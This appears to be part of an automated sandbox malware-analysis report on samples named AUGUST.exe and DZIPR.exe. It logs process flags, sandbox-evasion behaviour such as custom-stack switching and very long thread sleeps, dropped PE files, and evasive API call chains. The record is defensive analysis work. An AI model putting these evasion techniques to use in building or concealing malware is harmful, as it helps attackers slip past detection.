Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AUGUST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\DZIPR.exe	API/Special instruction interceptor: Address: 6C5D7C44
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	API/Special instruction interceptor: Address: 6C5D7C44
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	API/Special instruction interceptor: Address: 6C5D7945
Source: C:\Windows\SysWOW64\cmd.exe	API/Special instruction interceptor: Address: 6C5D3B54
Source: C:\Windows\SysWOW64\explorer.exe	API/Special instruction interceptor: Address: 4EA317

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4862	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4995	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4272	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3487	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 575	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5740	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3989	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\yigmovm	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mdvbfllr	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vqqcre	Jump to dropped file

Source: C:\Users\user\DZIPR.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep	graph_15-18712
Source: C:\Users\user\DZIPR.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess	graph_15-18810
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess	graph_16-18845
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep	graph_16-18747

Source: C:\Users\user\DZIPR.exe	API coverage: 4.5 %
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	API coverage: 4.7 %
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	API coverage: 4.5 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6240	Thread sleep count: 4862 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6240	Thread sleep count: 4995 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1908	Thread sleep time: -13835058055282155s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6432	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6920	Thread sleep count: 4272 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6832	Thread sleep count: 3487 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1060	Thread sleep time: -15679732462653109s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2644	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5856	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4788	Thread sleep count: 5740 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6204	Thread sleep time: -21213755684765971s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4184	Thread sleep count: 3989 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6104	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6528	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\AppData\Roaming\AUGUST.exe	Code function: 14_2_0040301A GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,	14_2_0040301A
Source: C:\Users\user\AppData\Roaming\AUGUST.exe	Code function: 14_2_00402B79 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,	14_2_00402B79
Source: C:\Users\user\DZIPR.exe	Code function: 15_2_6FA6748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,	15_2_6FA6748E
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 16_2_6C53748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,	16_2_6C53748E
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 20_2_6FD0748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,	20_2_6FD0748E

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
